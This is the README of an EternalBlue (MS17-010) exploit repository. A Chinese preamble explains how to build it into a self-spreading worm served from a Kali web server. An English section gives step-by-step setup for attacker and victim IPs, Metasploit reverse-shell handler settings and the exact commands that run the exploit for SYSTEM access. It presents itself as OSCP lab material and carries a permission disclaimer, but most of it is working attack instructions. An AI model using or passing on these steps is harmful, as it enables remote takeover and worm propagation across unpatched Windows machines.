使用说明:
1、clone代码到windows随便一个目录
2、安装pyinstal
python2 -m pip install pyinstall
注意一定要Pyton2
3、python2 -m pip install impacket
4、C:\Python27\Scripts\pyinstaller.e e -F eternalblue_exploit7.py
然后把dist文件夹下的exe拷贝到kali的/var/www/html里面改名e.exe
5、然后再clone一份到kali
6、运行./worm_start.sh
7、service apache2 start
将/var/www/html里面的1.exe放到要攻击的靶机上就可以运行
当然前提是有很多东西要改,在main.go和worm_start.sh里,很简单自己看着改吧,这里不讲了,必定是条虫子
另外这个版本是一个低效版,有一定概率能够蠕成功
This repository is forked from the fantastic work by Worawit on the NSA's exploit leaked by the ShadowBrokers.
This is a python port of the exploit and has an excellent reliability for exploiting Windows OS that are vulnerable to MS17-010/EternalBlue. use the checker.py script to see if the target is unpatched/vulnerable.
Worawits script is great but its not so simple or quick to compile and has many moving parts to get up and running. It is necessary to work with raw Assembly language, shellcode for multiple architectures, msfconsole etc.
What I have created a very handy bash script which will do all of the hard work for you and also gives instructions on how to exploit.
Because knowing how the exploit works is a lot more fun that firing up metasploit as well as that I created this out of necessity for the PWK course and the OSCP certification . Those of you undertaking either will be well aware of the fact that Metasploit is extremely limited during exam time, so this exploit offers you a very fast reliable and allowed way to exploit any targets with port 445,139 open that are vulnerable.
My generation script will output 2 files that can be read into msfconsole by using the -r flag (msfconsole -r /root/EternalBlueX64.rc), so you dont have to keep typing out
use exploit/multi/handler
set PAYLOAD windows/x64/shell_reverse_tcp
set EXITFUNC thread
set ExitOnSession false
set LHOST 192.168.*.**
set LPORT 5555
exploit -j
Its very reliable, I have not come across an unpatched Windows 7 PC that it has not worked against (in PWK and personal Lab environment). If the system is vulnerable and it does not work the first time around keep trying.. or take a break and regenerate the shellcode again and again, eventually you will own the computer and have full nt authority\system rights on the pwned system.
To get up and running theres 2 things you need to do, open up the start.sh file and add you own ip as the attackerIP and the victim OS IP in vulnerableIP you can optionally change the port numbers that msfconsole will listen on but generally you can leave them as is.
# change these values to your attacking IP and 2 ports for 32bit/64bit Architecture
attackerIP=192.168.2.133 # put your ip here*
vulnerableIP=192.168.2.253 # put the victim ip here*
arch_x86_port=4444 # x86 msfconsole multi handler port (optional change)
arch_x64_port=5555 # x64 msfconsole multi handler port (optional change)
fire up the script and just follow the on screen instructions after the 7 step generation process.
./start.sh
You will then need to copy 3 lines from the output 1 is the actual execution of the python eternalblue_exploit7.py exploit and the other 2 are the msfconsole helpers to start up 2 exploit/multi/handlers.. something similar to the following but youll see your specific commands in the output.
msfconsole -r "/root/MS17-010/output/EternalBlueX64.rc"
msfconsole -r "/root/MS17-010/output/EternalBlueX86.rc"
python /root/MS17-010/eternalblue_exploit7.py 192.168.*.** /root/MS17-010/bin/sc_all.bin 3
Do not use this on systems unless you have been given explicit permission. This is created for use in the PWK labs and OSCP exam lab. It may have unpreceedented consequenses both legally and ethically if used inappropriately. This is a POC script and I bare no responsibility for its use by others.